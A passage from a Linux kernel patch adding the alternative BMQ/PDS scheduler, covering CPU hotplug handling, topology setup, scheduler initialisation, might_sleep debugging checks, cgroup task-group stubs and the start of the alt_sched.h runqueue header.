++	raw_spin_lock_irqsave(&rq->lock, flags);
++	set_rq_online(rq);
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++	return 0;
++}
++
++int sched_cpu_deactivate(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++	int ret;
++
++	set_cpu_active(cpu, false);
++
++	/*
++	 * From this point forward, this CPU will refuse to run any task that
++	 * is not: migrate_disable() or KTHREAD_IS_PER_CPU, and will actively
++	 * push those tasks away until this gets cleared, see
++	 * sched_cpu_dying().
++	 */
++	balance_push_set(cpu, true);
++
++	/*
++	 * We've cleared cpu_active_mask, wait for all preempt-disabled and RCU
++	 * users of this state to go away such that all new such users will
++	 * observe it.
++	 *
++	 * Specifically, we rely on ttwu to no longer target this CPU, see
++	 * ttwu_queue_cond() and is_cpu_allowed().
++	 *
++	 * Do sync before park smpboot threads to take care the rcu boost case.
++	 */
++	synchronize_rcu();
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	update_rq_clock(rq);
++	set_rq_offline(rq);
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++#ifdef CONFIG_SCHED_SMT
++	/*
++	 * When going down, decrement the number of cores with SMT present.
++	 */
++	if (cpumask_weight(cpu_smt_mask(cpu)) == 2) {
++		static_branch_dec_cpuslocked(&sched_smt_present);
++		if (!static_branch_likely(&sched_smt_present))
++			cpumask_clear(&sched_sg_idle_mask);
++	}
++#endif
++
++	if (!sched_smp_initialized)
++		return 0;
++
++	ret = cpuset_cpu_inactive(cpu);
++	if (ret) {
++		balance_push_set(cpu, false);
++		set_cpu_active(cpu, true);
++		return ret;
++	}
++
++	return 0;
++}
++
++static void sched_rq_cpu_starting(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	rq->calc_load_update = calc_load_update;
++}
++
++int sched_cpu_starting(unsigned int cpu)
++{
++	sched_rq_cpu_starting(cpu);
++	sched_tick_start(cpu);
++	return 0;
++}
++
++#ifdef CONFIG_HOTPLUG_CPU
++
++/*
++ * Invoked immediately before the stopper thread is invoked to bring the
++ * CPU down completely. At this point all per CPU kthreads except the
++ * hotplug thread (current) and the stopper thread (inactive) have been
++ * either parked or have been unbound from the outgoing CPU. Ensure that
++ * any of those which might be on the way out are gone.
++ *
++ * If after this point a bound task is being woken on this CPU then the
++ * responsible hotplug callback has failed to do its job.
++ * sched_cpu_dying() will catch it with the appropriate fireworks.
++ */
++int sched_cpu_wait_empty(unsigned int cpu)
++{
++	balance_hotplug_wait();
++	return 0;
++}
++
++/*
++ * Since this CPU is going 'away' for a while, fold any nr_active delta we
++ * might have. Called from the CPU stopper task after ensuring that the
++ * stopper is the last running task on the CPU, so nr_active count is
++ * stable. We need to take the teardown thread which is calling this into
++ * account, so we hand in adjust = 1 to the load calculation.
++ *
++ * Also see the comment "Global load-average calculations".
++ */
++static void calc_load_migrate(struct rq *rq)
++{
++	long delta = calc_load_fold_active(rq, 1);
++
++	if (delta)
++		atomic_long_add(delta, &calc_load_tasks);
++}
++
++static void dump_rq_tasks(struct rq *rq, const char *loglvl)
++{
++	struct task_struct *g, *p;
++	int cpu = cpu_of(rq);
++
++	lockdep_assert_held(&rq->lock);
++
++	printk("%sCPU%d enqueued tasks (%u total):\n", loglvl, cpu, rq->nr_running);
++	for_each_process_thread(g, p) {
++		if (task_cpu(p) != cpu)
++			continue;
++
++		if (!task_on_rq_queued(p))
++			continue;
++
++		printk("%s\tpid: %d, name: %s\n", loglvl, p->pid, p->comm);
++	}
++}
++
++int sched_cpu_dying(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	/* Handle pending wakeups and then migrate everything off */
++	sched_tick_stop(cpu);
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	if (rq->nr_running != 1 || rq_has_pinned_tasks(rq)) {
++		WARN(true, "Dying CPU not properly vacated!");
++		dump_rq_tasks(rq, KERN_WARNING);
++	}
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++	calc_load_migrate(rq);
++	hrtick_clear(rq);
++	return 0;
++}
++#endif
++
++#ifdef CONFIG_SMP
++static void sched_init_topology_cpumask_early(void)
++{
++	int cpu;
++	cpumask_t *tmp;
++
++	for_each_possible_cpu(cpu) {
++		/* init topo masks */
++		tmp = per_cpu(sched_cpu_topo_masks, cpu);
++
++		cpumask_copy(tmp, cpumask_of(cpu));
++		tmp++;
++		cpumask_copy(tmp, cpu_possible_mask);
++		per_cpu(sched_cpu_llc_mask, cpu) = tmp;
++		per_cpu(sched_cpu_topo_end_mask, cpu) = ++tmp;
++		/*per_cpu(sd_llc_id, cpu) = cpu;*/
++	}
++}
++
++#define TOPOLOGY_CPUMASK(name, mask, last)\
++	if (cpumask_and(topo, topo, mask)) {					\
++		cpumask_copy(topo, mask);					\
++		printk(KERN_INFO "sched: cpu#%02d topo: 0x%08lx - "#name,	\
++		       cpu, (topo++)->bits[0]);					\
++	}									\
++	if (!last)								\
++		cpumask_complement(topo, mask)
++
++static void sched_init_topology_cpumask(void)
++{
++	int cpu;
++	cpumask_t *topo;
++
++	for_each_online_cpu(cpu) {
++		/* take chance to reset time slice for idle tasks */
++		cpu_rq(cpu)->idle->time_slice = sched_timeslice_ns;
++
++		topo = per_cpu(sched_cpu_topo_masks, cpu) + 1;
++
++		cpumask_complement(topo, cpumask_of(cpu));
++#ifdef CONFIG_SCHED_SMT
++		TOPOLOGY_CPUMASK(smt, topology_sibling_cpumask(cpu), false);
++#endif
++		per_cpu(sd_llc_id, cpu) = cpumask_first(cpu_coregroup_mask(cpu));
++		per_cpu(sched_cpu_llc_mask, cpu) = topo;
++		TOPOLOGY_CPUMASK(coregroup, cpu_coregroup_mask(cpu), false);
++
++		TOPOLOGY_CPUMASK(core, topology_core_cpumask(cpu), false);
++
++		TOPOLOGY_CPUMASK(others, cpu_online_mask, true);
++
++		per_cpu(sched_cpu_topo_end_mask, cpu) = topo;
++		printk(KERN_INFO "sched: cpu#%02d llc_id = %d, llc_mask idx = %d\n",
++		       cpu, per_cpu(sd_llc_id, cpu),
++		       (int) (per_cpu(sched_cpu_llc_mask, cpu) -
++			      per_cpu(sched_cpu_topo_masks, cpu)));
++	}
++}
++#endif
++
++void __init sched_init_smp(void)
++{
++	/* Move init over to a non-isolated CPU */
++	if (set_cpus_allowed_ptr(current, housekeeping_cpumask(HK_TYPE_DOMAIN)) < 0)
++		BUG();
++	current->flags &= ~PF_NO_SETAFFINITY;
++
++	sched_init_topology_cpumask();
++
++	sched_smp_initialized = true;
++}
++
++static int __init migration_init(void)
++{
++	sched_cpu_starting(smp_processor_id());
++	return 0;
++}
++early_initcall(migration_init);
++
++#else
++void __init sched_init_smp(void)
++{
++	cpu_rq(0)->idle->time_slice = sched_timeslice_ns;
++}
++#endif /* CONFIG_SMP */
++
++int in_sched_functions(unsigned long addr)
++{
++	return in_lock_functions(addr) ||
++		(addr >= (unsigned long)__sched_text_start
++		&& addr < (unsigned long)__sched_text_end);
++}
++
++#ifdef CONFIG_CGROUP_SCHED
++/* task group related information */
++struct task_group {
++	struct cgroup_subsys_state css;
++
++	struct rcu_head rcu;
++	struct list_head list;
++
++	struct task_group *parent;
++	struct list_head siblings;
++	struct list_head children;
++#ifdef CONFIG_FAIR_GROUP_SCHED
++	unsigned long		shares;
++#endif
++};
++
++/*
++ * Default task group.
++ * Every task in system belongs to this group at bootup.
++ */
++struct task_group root_task_group;
++LIST_HEAD(task_groups);
++
++/* Cacheline aligned slab cache for task_group */
++static struct kmem_cache *task_group_cache __read_mostly;
++#endif /* CONFIG_CGROUP_SCHED */
++
++void __init sched_init(void)
++{
++	int i;
++	struct rq *rq;
++
++	printk(KERN_INFO ALT_SCHED_VERSION_MSG);
++
++	wait_bit_init();
++
++#ifdef CONFIG_SMP
++	for (i = 0; i < SCHED_QUEUE_BITS; i++)
++		cpumask_copy(sched_preempt_mask + i, cpu_present_mask);
++#endif
++
++#ifdef CONFIG_CGROUP_SCHED
++	task_group_cache = KMEM_CACHE(task_group, 0);
++
++	list_add(&root_task_group.list, &task_groups);
++	INIT_LIST_HEAD(&root_task_group.children);
++	INIT_LIST_HEAD(&root_task_group.siblings);
++#endif /* CONFIG_CGROUP_SCHED */
++	for_each_possible_cpu(i) {
++		rq = cpu_rq(i);
++
++		sched_queue_init(&rq->queue);
++		rq->prio = IDLE_TASK_SCHED_PRIO;
++		rq->skip = NULL;
++
++		raw_spin_lock_init(&rq->lock);
++		rq->nr_running = rq->nr_uninterruptible = 0;
++		rq->calc_load_active = 0;
++		rq->calc_load_update = jiffies + LOAD_FREQ;
++#ifdef CONFIG_SMP
++		rq->online = false;
++		rq->cpu = i;
++
++#ifdef CONFIG_SCHED_SMT
++		rq->active_balance = 0;
++#endif
++
++#ifdef CONFIG_NO_HZ_COMMON
++		INIT_CSD(&rq->nohz_csd, nohz_csd_func, rq);
++#endif
++		rq->balance_callback = &balance_push_callback;
++#ifdef CONFIG_HOTPLUG_CPU
++		rcuwait_init(&rq->hotplug_wait);
++#endif
++#endif /* CONFIG_SMP */
++		rq->nr_switches = 0;
++
++		hrtick_rq_init(rq);
++		atomic_set(&rq->nr_iowait, 0);
++
++		zalloc_cpumask_var_node(&rq->scratch_mask, GFP_KERNEL, cpu_to_node(i));
++	}
++#ifdef CONFIG_SMP
++	/* Set rq->online for cpu 0 */
++	cpu_rq(0)->online = true;
++#endif
++	/*
++	 * The boot idle thread does lazy MMU switching as well:
++	 */
++	mmgrab(&init_mm);
++	enter_lazy_tlb(&init_mm, current);
++
++	/*
++	 * The idle task doesn't need the kthread struct to function, but it
++	 * is dressed up as a per-CPU kthread and thus needs to play the part
++	 * if we want to avoid special-casing it in code that deals with per-CPU
++	 * kthreads.
++	 */
++	WARN_ON(!set_kthread_struct(current));
++
++	/*
++	 * Make us the idle thread. Technically, schedule() should not be
++	 * called from this thread, however somewhere below it might be,
++	 * but because we are the idle thread, we just pick up running again
++	 * when this runqueue becomes "idle".
++	 */
++	init_idle(current, smp_processor_id());
++
++	calc_load_update = jiffies + LOAD_FREQ;
++
++#ifdef CONFIG_SMP
++	idle_thread_set_boot_cpu();
++	balance_push_set(smp_processor_id(), false);
++
++	sched_init_topology_cpumask_early();
++#endif /* SMP */
++
++	psi_init();
++
++	preempt_dynamic_init();
++}
++
++#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
++
++void __might_sleep(const char *file, int line)
++{
++	unsigned int state = get_current_state();
++	/*
++	 * Blocking primitives will set (and therefore destroy) current->state,
++	 * since we will exit with TASK_RUNNING make sure we enter with it,
++	 * otherwise we will destroy state.
++	 */
++	WARN_ONCE(state != TASK_RUNNING && current->task_state_change,
++			"do not call blocking ops when !TASK_RUNNING; "
++			"state=%x set at [<%p>] %pS\n", state,
++			(void *)current->task_state_change,
++			(void *)current->task_state_change);
++
++	__might_resched(file, line, 0);
++}
++EXPORT_SYMBOL(__might_sleep);
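++
++/*
++ * Usage sketch: annotate a function that may block so that calling it
++ * from atomic context is caught even on runs where it happens not to
++ * sleep:
++ *
++ *	void my_helper(void)		// hypothetical
++ *	{
++ *		might_sleep();
++ *		mutex_lock(&mutex);
++ *		...
++ *		mutex_unlock(&mutex);
++ *	}
++ */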
++
++static void print_preempt_disable_ip(int preempt_offset, unsigned long ip)
++{
++	if (!IS_ENABLED(CONFIG_DEBUG_PREEMPT))
++		return;
++
++	if (preempt_count() == preempt_offset)
++		return;
++
++	pr_err("Preemption disabled at:");
++	print_ip_sym(KERN_ERR, ip);
++}
++
++static inline bool resched_offsets_ok(unsigned int offsets)
++{
++	unsigned int nested = preempt_count();
++
++	nested += rcu_preempt_depth() << MIGHT_RESCHED_RCU_SHIFT;
++
++	return nested == offsets;
++}
++
++void __might_resched(const char *file, int line, unsigned int offsets)
++{
++	/* Ratelimiting timestamp: */
++	static unsigned long prev_jiffy;
++
++	unsigned long preempt_disable_ip;
++
++	/* WARN_ON_ONCE() by default, no rate limit required: */
++	rcu_sleep_check();
++
++	if ((resched_offsets_ok(offsets) && !irqs_disabled() &&
++	     !is_idle_task(current) && !current->non_block_count) ||
++	    system_state == SYSTEM_BOOTING || system_state > SYSTEM_RUNNING ||
++	    oops_in_progress)
++		return;
++	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
++		return;
++	prev_jiffy = jiffies;
++
++	/* Save this before calling printk(), since that will clobber it: */
++	preempt_disable_ip = get_preempt_disable_ip(current);
++
++	pr_err("BUG: sleeping function called from invalid context at %s:%d\n",
++	       file, line);
++	pr_err("in_atomic(): %d, irqs_disabled(): %d, non_block: %d, pid: %d, name: %s\n",
++	       in_atomic(), irqs_disabled(), current->non_block_count,
++	       current->pid, current->comm);
++	pr_err("preempt_count: %x, expected: %x\n", preempt_count(),
++	       offsets & MIGHT_RESCHED_PREEMPT_MASK);
++
++	if (IS_ENABLED(CONFIG_PREEMPT_RCU)) {
++		pr_err("RCU nest depth: %d, expected: %u\n",
++		       rcu_preempt_depth(), offsets >> MIGHT_RESCHED_RCU_SHIFT);
++	}
++
++	if (task_stack_end_corrupted(current))
++		pr_emerg("Thread overran stack, or stack corrupted\n");
++
++	debug_show_held_locks(current);
++	if (irqs_disabled())
++		print_irqtrace_events(current);
++
++	print_preempt_disable_ip(offsets & MIGHT_RESCHED_PREEMPT_MASK,
++				 preempt_disable_ip);
++
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++EXPORT_SYMBOL(__might_resched);
++
++void __cant_sleep(const char *file, int line, int preempt_offset)
++{
++	static unsigned long prev_jiffy;
++
++	if (irqs_disabled())
++		return;
++
++	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
++		return;
++
++	if (preempt_count() > preempt_offset)
++		return;
++
++	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
++		return;
++	prev_jiffy = jiffies;
++
++	printk(KERN_ERR "BUG: assuming atomic context at %s:%d\n", file, line);
++	printk(KERN_ERR "in_atomic(): %d, irqs_disabled(): %d, pid: %d, name: %s\n",
++			in_atomic(), irqs_disabled(),
++			current->pid, current->comm);
++
++	debug_show_held_locks(current);
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++EXPORT_SYMBOL_GPL(__cant_sleep);
++
++#ifdef CONFIG_SMP
++void __cant_migrate(const char *file, int line)
++{
++	static unsigned long prev_jiffy;
++
++	if (irqs_disabled())
++		return;
++
++	if (is_migration_disabled(current))
++		return;
++
++	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
++		return;
++
++	if (preempt_count() > 0)
++		return;
++
++	if (current->migration_flags & MDF_FORCE_ENABLED)
++		return;
++
++	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
++		return;
++	prev_jiffy = jiffies;
++
++	pr_err("BUG: assuming non migratable context at %s:%d\n", file, line);
++	pr_err("in_atomic(): %d, irqs_disabled(): %d, migration_disabled() %u pid: %d, name: %s\n",
++	       in_atomic(), irqs_disabled(), is_migration_disabled(current),
++	       current->pid, current->comm);
++
++	debug_show_held_locks(current);
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++EXPORT_SYMBOL_GPL(__cant_migrate);
++#endif
++#endif
++
++#ifdef CONFIG_MAGIC_SYSRQ
++void normalize_rt_tasks(void)
++{
++	struct task_struct *g, *p;
++	struct sched_attr attr = {
++		.sched_policy = SCHED_NORMAL,
++	};
++
++	read_lock(&tasklist_lock);
++	for_each_process_thread(g, p) {
++		/*
++		 * Only normalize user tasks:
++		 */
++		if (p->flags & PF_KTHREAD)
++			continue;
++
++		schedstat_set(p->stats.wait_start,  0);
++		schedstat_set(p->stats.sleep_start, 0);
++		schedstat_set(p->stats.block_start, 0);
++
++		if (!rt_task(p)) {
++			/*
++			 * Renice negative nice level userspace
++			 * tasks back to 0:
++			 */
++			if (task_nice(p) < 0)
++				set_user_nice(p, 0);
++			continue;
++		}
++
++		__sched_setscheduler(p, &attr, false, false);
++	}
++	read_unlock(&tasklist_lock);
++}
++#endif /* CONFIG_MAGIC_SYSRQ */
++
++#if defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB)
++/*
++ * These functions are only useful for the IA64 MCA handling, or kdb.
++ *
++ * They can only be called when the whole system has been
++ * stopped - every CPU needs to be quiescent, and no scheduling
++ * activity can take place. Using them for anything else would
++ * be a serious bug, and as a result, they aren't even visible
++ * under any other configuration.
++ */
++
++/**
++ * curr_task - return the current task for a given CPU.
++ * @cpu: the processor in question.
++ *
++ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
++ *
++ * Return: The current task for @cpu.
++ */
++struct task_struct *curr_task(int cpu)
++{
++	return cpu_curr(cpu);
++}
++
++#endif /* defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB) */
++
++#ifdef CONFIG_IA64
++/**
++ * ia64_set_curr_task - set the current task for a given CPU.
++ * @cpu: the processor in question.
++ * @p: the task pointer to set.
++ *
++ * Description: This function must only be used when non-maskable interrupts
++ * are serviced on a separate stack.  It allows the architecture to switch the
++ * notion of the current task on a CPU in a non-blocking manner.  This function
++ * must be called with all CPUs synchronised and interrupts disabled; the
++ * caller must save the original value of the current task (see
++ * curr_task() above) and restore that value before reenabling interrupts and
++ * re-starting the system.
++ *
++ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
++ */
++void ia64_set_curr_task(int cpu, struct task_struct *p)
++{
++	cpu_curr(cpu) = p;
++}
++
++#endif
++
++#ifdef CONFIG_CGROUP_SCHED
++static void sched_free_group(struct task_group *tg)
++{
++	kmem_cache_free(task_group_cache, tg);
++}
++
++static void sched_free_group_rcu(struct rcu_head *rhp)
++{
++	sched_free_group(container_of(rhp, struct task_group, rcu));
++}
++
++static void sched_unregister_group(struct task_group *tg)
++{
++	/*
++	 * We have to wait for yet another RCU grace period to expire, as
++	 * print_cfs_stats() might run concurrently.
++	 */
++	call_rcu(&tg->rcu, sched_free_group_rcu);
++}
++
++/* allocate runqueue etc for a new task group */
++struct task_group *sched_create_group(struct task_group *parent)
++{
++	struct task_group *tg;
++
++	tg = kmem_cache_alloc(task_group_cache, GFP_KERNEL | __GFP_ZERO);
++	if (!tg)
++		return ERR_PTR(-ENOMEM);
++
++	return tg;
++}
++
++void sched_online_group(struct task_group *tg, struct task_group *parent)
++{
++}
++
++/* rcu callback to free various structures associated with a task group */
++static void sched_unregister_group_rcu(struct rcu_head *rhp)
++{
++	/* Now it should be safe to free those cfs_rqs: */
++	sched_unregister_group(container_of(rhp, struct task_group, rcu));
++}
++
++void sched_destroy_group(struct task_group *tg)
++{
++	/* Wait for possible concurrent references to cfs_rqs to complete: */
++	call_rcu(&tg->rcu, sched_unregister_group_rcu);
++}
++
++void sched_release_group(struct task_group *tg)
++{
++}
++
++static inline struct task_group *css_tg(struct cgroup_subsys_state *css)
++{
++	return css ? container_of(css, struct task_group, css) : NULL;
++}
++
++static struct cgroup_subsys_state *
++cpu_cgroup_css_alloc(struct cgroup_subsys_state *parent_css)
++{
++	struct task_group *parent = css_tg(parent_css);
++	struct task_group *tg;
++
++	if (!parent) {
++		/* This is early initialization for the top cgroup */
++		return &root_task_group.css;
++	}
++
++	tg = sched_create_group(parent);
++	if (IS_ERR(tg))
++		return ERR_PTR(-ENOMEM);
++	return &tg->css;
++}
++
++/* Expose task group only after completing cgroup initialization */
++static int cpu_cgroup_css_online(struct cgroup_subsys_state *css)
++{
++	struct task_group *tg = css_tg(css);
++	struct task_group *parent = css_tg(css->parent);
++
++	if (parent)
++		sched_online_group(tg, parent);
++	return 0;
++}
++
++static void cpu_cgroup_css_released(struct cgroup_subsys_state *css)
++{
++	struct task_group *tg = css_tg(css);
++
++	sched_release_group(tg);
++}
++
++static void cpu_cgroup_css_free(struct cgroup_subsys_state *css)
++{
++	struct task_group *tg = css_tg(css);
++
++	/*
++	 * Relies on the RCU grace period between css_released() and this.
++	 */
++	sched_unregister_group(tg);
++}
++
++#ifdef CONFIG_RT_GROUP_SCHED
++static int cpu_cgroup_can_attach(struct cgroup_taskset *tset)
++{
++	return 0;
++}
++#endif
++
++static void cpu_cgroup_attach(struct cgroup_taskset *tset)
++{
++}
++
++#ifdef CONFIG_FAIR_GROUP_SCHED
++static DEFINE_MUTEX(shares_mutex);
++
++int sched_group_set_shares(struct task_group *tg, unsigned long shares)
++{
++	/*
++	 * We can't change the weight of the root cgroup.
++	 */
++	if (&root_task_group == tg)
++		return -EINVAL;
++
++	shares = clamp(shares, scale_load(MIN_SHARES), scale_load(MAX_SHARES));
++
++	mutex_lock(&shares_mutex);
++	if (tg->shares == shares)
++		goto done;
++
++	tg->shares = shares;
++done:
++	mutex_unlock(&shares_mutex);
++	return 0;
++}
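++
++/*
++ * Usage sketch (cgroup v1): the value is exposed as "cpu.shares", e.g.
++ *
++ *	# echo 2048 > /sys/fs/cgroup/cpu/mygroup/cpu.shares
++ *
++ * Note that here the value is only stored; nothing else in this
++ * scheduler consumes tg->shares.
++ */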
++
++static int cpu_shares_write_u64(struct cgroup_subsys_state *css,
++				struct cftype *cftype, u64 shareval)
++{
++	if (shareval > scale_load_down(ULONG_MAX))
++		shareval = MAX_SHARES;
++	return sched_group_set_shares(css_tg(css), scale_load(shareval));
++}
++
++static u64 cpu_shares_read_u64(struct cgroup_subsys_state *css,
++			       struct cftype *cft)
++{
++	struct task_group *tg = css_tg(css);
++
++	return (u64) scale_load_down(tg->shares);
++}
++#endif
++
++static struct cftype cpu_legacy_files[] = {
++#ifdef CONFIG_FAIR_GROUP_SCHED
++	{
++		.name = "shares",
++		.read_u64 = cpu_shares_read_u64,
++		.write_u64 = cpu_shares_write_u64,
++	},
++#endif
++	{ }	/* Terminate */
++};
++
++static struct cftype cpu_files[] = {
++	{ }	/* terminate */
++};
++
++static int cpu_extra_stat_show(struct seq_file *sf,
++			       struct cgroup_subsys_state *css)
++{
++	return 0;
++}
++
++struct cgroup_subsys cpu_cgrp_subsys = {
++	.css_alloc	= cpu_cgroup_css_alloc,
++	.css_online	= cpu_cgroup_css_online,
++	.css_released	= cpu_cgroup_css_released,
++	.css_free	= cpu_cgroup_css_free,
++	.css_extra_stat_show = cpu_extra_stat_show,
++#ifdef CONFIG_RT_GROUP_SCHED
++	.can_attach	= cpu_cgroup_can_attach,
++#endif
++	.attach		= cpu_cgroup_attach,
++	.legacy_cftypes	= cpu_legacy_files,
++	.dfl_cftypes	= cpu_files,
++	.early_init	= true,
++	.threaded	= true,
++};
++#endif	/* CONFIG_CGROUP_SCHED */
++
++#undef CREATE_TRACE_POINTS
+diff --git a/kernel/sched/alt_debug.c b/kernel/sched/alt_debug.c
+new file mode 100644
+index 000000000000..1212a031700e
+--- /dev/null
++++ b/kernel/sched/alt_debug.c
+@@ -0,0 +1,31 @@
++/*
++ * kernel/sched/alt_debug.c
++ *
++ * Print the alt scheduler debugging details
++ *
++ * Author: Alfred Chen
++ * Date  : 2020
++ */
++#include "sched.h"
++
++/*
++ * This allows printing both to /proc/sched_debug and
++ * to the console
++ */
++#define SEQ_printf(m, x...)			\
++ do {						\
++	if (m)					\
++		seq_printf(m, x);		\
++	else					\
++		pr_cont(x);			\
++ } while (0)
++
++void proc_sched_show_task(struct task_struct *p, struct pid_namespace *ns,
++			  struct seq_file *m)
++{
++	SEQ_printf(m, "%s (%d, #threads: %d)\n", p->comm, task_pid_nr_ns(p, ns),
++						get_nr_threads(p));
++}
++
++void proc_sched_set_task(struct task_struct *p)
++{}
+diff --git a/kernel/sched/alt_sched.h b/kernel/sched/alt_sched.h
+new file mode 100644
+index 000000000000..0b563999d4c1
+--- /dev/null
++++ b/kernel/sched/alt_sched.h
+@@ -0,0 +1,671 @@
++#ifndef ALT_SCHED_H
++#define ALT_SCHED_H
++
++#include <linux/context_tracking.h>
++#include <linux/profile.h>
++#include <linux/psi.h>
++#include <linux/stop_machine.h>
++#include <linux/syscalls.h>
++#include <linux/tick.h>
++
++#include <trace/events/power.h>
++#include <trace/events/sched.h>
++
++#include "../workqueue_internal.h"
++
++#include "cpupri.h"
++
++#ifdef CONFIG_SCHED_BMQ
++/* bits:
++ * RT(0-99), (Low prio adj range, nice width, high prio adj range) / 2, cpu idle task */
++#define SCHED_BITS	(MAX_RT_PRIO + NICE_WIDTH / 2 + MAX_PRIORITY_ADJ + 1)
++#endif
++
++#ifdef CONFIG_SCHED_PDS
++/* bits: RT(0-99), reserved(100-127), NORMAL_PRIO_NUM, cpu idle task */
++#define SCHED_BITS	(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM + 1)
++#endif /* CONFIG_SCHED_PDS */
++
++#define IDLE_TASK_SCHED_PRIO	(SCHED_BITS - 1)
++
++#ifdef CONFIG_SCHED_DEBUG
++# define SCHED_WARN_ON(x)	WARN_ONCE(x, #x)
++extern void resched_latency_warn(int cpu, u64 latency);
++#else
++# define SCHED_WARN_ON(x)	({ (void)(x), 0; })
++static inline void resched_latency_warn(int cpu, u64 latency) {}
++#endif
++
++/*
++ * Increase resolution of nice-level calculations for 64-bit architectures.
++ * The extra resolution improves shares distribution and load balancing of
++ * low-weight task groups (e.g. nice +19 on an autogroup), deeper taskgroup
++ * hierarchies, especially on larger systems. This is not a user-visible change
++ * and does not change the user-interface for setting shares/weights.
++ *
++ * We increase resolution only if we have enough bits to allow this increased
++ * resolution (i.e. 64-bit). The costs for increasing resolution when 32-bit
++ * are pretty high and the returns do not justify the increased costs.
++ *
++ * Really only required when CONFIG_FAIR_GROUP_SCHED=y is also set, but to
++ * increase coverage and consistency always enable it on 64-bit platforms.
++ */
++#ifdef CONFIG_64BIT
++# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT + SCHED_FIXEDPOINT_SHIFT)
++# define scale_load(w)		((w) << SCHED_FIXEDPOINT_SHIFT)
++# define scale_load_down(w) \
++({ \
++	unsigned long __w = (w); \
++	if (__w) \
++		__w = max(2UL, __w >> SCHED_FIXEDPOINT_SHIFT); \
++	__w; \
++})
++#else
++# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT)
++# define scale_load(w)		(w)
++# define scale_load_down(w)	(w)
++#endif
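++
++/*
++ * Worked example on 64-bit: the nice-0 weight of 1024 is scaled up to
++ * 1024 << 10 == 1048576 internally, and scale_load_down() clamps any
++ * non-zero result to at least 2:
++ *
++ *	scale_load(1024)		== 1048576
++ *	scale_load_down(1048576)	== 1024
++ *	scale_load_down(1024)		== 2	// (1024 >> 10) clamped
++ */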
++
++#ifdef CONFIG_FAIR_GROUP_SCHED
++#define ROOT_TASK_GROUP_LOAD	NICE_0_LOAD
++
++/*
++ * A weight of 0 or 1 can cause arithmetic problems.
++ * The weight of a cfs_rq is the sum of the weights of the entities
++ * queued on it, so the weight of an entity should not be too large;
++ * the same goes for the shares value of a task group.
++ * (The default weight is 1024 - so there's no practical
++ *  limitation from this.)
++ */
++#define MIN_SHARES		(1UL <<  1)
++#define MAX_SHARES		(1UL << 18)
++#endif
++
++/*
++ * Tunables that become constants when CONFIG_SCHED_DEBUG is off:
++ */
++#ifdef CONFIG_SCHED_DEBUG
++# define const_debug __read_mostly
++#else
++# define const_debug const
++#endif
++
++/* task_struct::on_rq states: */
++#define TASK_ON_RQ_QUEUED	1
++#define TASK_ON_RQ_MIGRATING	2
++
++static inline int task_on_rq_queued(struct task_struct *p)
++{
++	return p->on_rq == TASK_ON_RQ_QUEUED;
++}
++
++static inline int task_on_rq_migrating(struct task_struct *p)
++{
++	return READ_ONCE(p->on_rq) == TASK_ON_RQ_MIGRATING;
++}
++
++/*
++ * wake flags
++ */
++#define WF_SYNC		0x01		/* waker goes to sleep after wakeup */
++#define WF_FORK		0x02		/* child wakeup after fork */
++#define WF_MIGRATED	0x04		/* internal use, task got migrated */
++
++#define SCHED_QUEUE_BITS	(SCHED_BITS - 1)
++
++struct sched_queue {
++	DECLARE_BITMAP(bitmap, SCHED_QUEUE_BITS);
++	struct list_head heads[SCHED_BITS];
++};
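++
++/*
++ * A task at priority index idx is queued roughly as
++ *	list_add_tail(&p->sq_node, &rq->queue.heads[idx]);
++ *	set_bit(idx, rq->queue.bitmap);
++ * and the next index to pick is find_first_bit(rq->queue.bitmap,
++ * SCHED_QUEUE_BITS), the lowest set bit being the highest priority.
++ */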
++
++struct rq;
++struct balance_callback {
++	struct balance_callback *next;
++	void (*func)(struct rq *rq);
++};
++
++/*
++ * This is the main, per-CPU runqueue data structure.
++ * This data should only be modified by the local cpu.
++ */
++struct rq {
++	/* runqueue lock: */
++	raw_spinlock_t lock;
++
++	struct task_struct __rcu *curr;
++	struct task_struct *idle, *stop, *skip;
++	struct mm_struct *prev_mm;
++
++	struct sched_queue	queue;
++#ifdef CONFIG_SCHED_PDS
++	u64			time_edge;
++#endif
++	unsigned long prio;
++
++	/* switch count */
++	u64 nr_switches;
++
++	atomic_t nr_iowait;
++
++#ifdef CONFIG_SCHED_DEBUG
++	u64 last_seen_need_resched_ns;
++	int ticks_without_resched;
++#endif
++
++#ifdef CONFIG_MEMBARRIER
++	int membarrier_state;
++#endif
++
++#ifdef CONFIG_SMP
++	int cpu;		/* cpu of this runqueue */
++	bool online;
++
++	unsigned int		ttwu_pending;
++	unsigned char		nohz_idle_balance;
++	unsigned char		idle_balance;
++
++#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
++	struct sched_avg	avg_irq;
++#endif
++
++#ifdef CONFIG_SCHED_SMT
++	int active_balance;
++	struct cpu_stop_work	active_balance_work;
++#endif
++	struct balance_callback	*balance_callback;
++#ifdef CONFIG_HOTPLUG_CPU
++	struct rcuwait		hotplug_wait;
++#endif
++	unsigned int		nr_pinned;
++
++#endif /* CONFIG_SMP */
++#ifdef CONFIG_IRQ_TIME_ACCOUNTING
